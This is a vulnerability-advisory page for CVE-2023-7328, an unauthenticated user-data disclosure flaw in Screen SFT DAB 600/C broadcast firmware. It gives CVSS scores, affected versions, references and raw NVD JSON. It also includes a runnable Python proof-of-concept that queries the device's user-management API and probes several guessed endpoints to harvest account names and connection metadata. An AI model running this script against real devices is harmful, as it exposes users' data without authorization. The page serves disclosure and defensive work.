CVE-2023-7328

Description

Screen SFT DAB 600/C firmware versions up to and including 1.9.3 contain an improper access control on the user management API allows unauthenticated requests to retrieve structured user data, including account names and connection metadata such as client IP and timeout values.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:sft_dab_600\/c_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:sft_dab_600\/c:-:*:*:*:*:*:*:* - NOT VULNERABLE

Screen SFT DAB 600/C firmware <= 1.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2023-7328 PoC - Screen SFT DAB 600/C Unauthenticated Information Disclosure
# Target: Screen SFT DAB 600/C firmware <= 1.9.3
# Vulnerability: Improper Access Control on User Management API

def exploit_cve_2023_7328(target_ip, target_port=80):
    """
    Exploit for CVE-2023-7328
    This PoC demonstrates the unauthenticated access to user management API
    """
    # Target URL for user management API endpoint
    url = f"http://{target_ip}:{target_port}/api/user/list"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2023-7328-PoC)",
        "Accept": "application/json"
    }
    
    try:
        # Send unauthenticated request to user management API
        response = requests.get(url, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Successfully accessed user management API")
            print(f"[+] Response Status: {response.status_code}")
            print(f"[+] Response Content-Type: {response.headers.get('Content-Type')}")
            print(f"[+] Retrieved User Data:")
            print(response.text)
            return response.json()
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")
        return None

def enumerate_users(target_ip, target_port=80):
    """
    Enumerate user information including connection metadata
    """
    # Alternative endpoints that may expose user data
    endpoints = [
        "/api/users",
        "/api/user/list",
        "/api/admin/users",
        "/api/v1/users",
        "/user/list",
        "/admin/user/list"
    ]
    
    results = []
    for endpoint in endpoints:
        url = f"http://{target_ip}:{target_port}{endpoint}"
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                results.append({"endpoint": endpoint, "data": response.text})
        except:
            pass
    return results

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2023_7328_poc.py <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit_cve_2023_7328(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-7328
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-7328
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-7328/
[4] VulDB https://vuldb.com/cve/CVE-2023-7328
[5] https://packetstormsecurity.com/files/172332/
[6] https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
[7] https://www.exploit-db.com/exploits/51460
[8] https://www.vulncheck.com/advisories/screen-sft-dab-600c-unauthenticated-information-disclosure
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php
[10] https://www.exploit-db.com/exploits/51460
[11] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-7328", "sourceIdentifier": "[email protected]", "published": "2025-11-14T23:15:43.640", "lastModified": "2025-12-26T16:45:24.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Screen SFT DAB 600/C firmware versions up to and including 1.9.3 contain an improper access control on the user management API allows unauthenticated requests to retrieve structured user data, including account names and connection metadata such as client IP and timeout values."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:sft_dab_600\\/c_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.9.3", "matchCriteriaId": "1C26364A-87B1-456E-833E-72133B747E78"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:sft_dab_600\\/c:-:*:*:*:*:*:*:*", "matchCriteriaId": "97E91C9F-B55C-4B1A-BE03-D1F03AC90FE5"}]}]}], "references": [{"url": "https://packetstormsecurity.com/files/172332/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51460", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/screen-sft-dab-600c-unauthenticated-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51460", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}